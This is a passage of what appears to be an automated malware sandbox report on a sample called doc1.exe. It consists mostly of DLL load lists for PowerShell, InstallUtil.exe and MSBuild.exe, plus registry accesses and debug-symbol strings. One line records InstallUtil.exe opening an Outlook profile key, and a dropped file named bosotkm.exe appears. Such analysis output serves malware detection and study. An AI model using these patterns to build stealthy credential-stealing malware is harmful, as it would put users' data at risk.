                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\doc1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\doc1.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: doc1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: doc1.exeStatic file information: File size 1118840 > 1048576
                  Source: doc1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2864210130.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDBJ source: MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb|) source: MSBuild.exe, 00000029.00000002.3038923676.00000000013E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2864210130.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\MSBuild.pdbpdbild.pdbH source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\MSBuild.pdbpdbild.pdbS source: MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2864210130.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038923676.00000000013E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb\dp`d source: WERF2AF.tmp.dmp.24.dr
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: inaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb= source: MSBuild.exe, 00000023.00000002.2865138161.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbH source: MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbYQ source: MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2458450033.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2562731419.000000000154D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2555966193.0000000000FD8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700081075.00000000006F8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2863825564.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038923676.00000000013FF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3036386294.0000000000F58000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdbs source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb((^ source: MSBuild.exe, 00000016.00000002.2558663468.00000000014E2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdb` source: WERC3B0.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\MSBuild.pdb,) source: MSBuild.exe, 00000029.00000002.3038923676.00000000013E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\MSBuild.pdbf source: MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbL} source: MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB source: MSBuild.exe, 00000023.00000002.2865138161.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbL08w# source: WERF2AF.tmp.dmp.24.dr
                  Source: Binary string: mscorlib.pdb7 source: WERABFD.tmp.dmp.43.dr
                  Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdbH source: MSBuild.exe, 00000016.00000002.2558663468.0000000001468000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: doc1.exe, 00000001.00000002.2293545434.0000000002BB8000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003A51000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2304587014.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2615450393.00000000043AB000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\MSBuild.pdbV source: MSBuild.exe, 00000023.00000002.2864210130.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbw source: MSBuild.exe, 00000023.00000002.2864210130.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2865138161.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.Core.pdbMSBuild.exe source: WERC3B0.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdbS source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdb6 source: WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb$ source: MSBuild.exe, 00000023.00000002.2864210130.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB089 source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb! source: MSBuild.exe, 00000016.00000002.2558663468.0000000001468000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
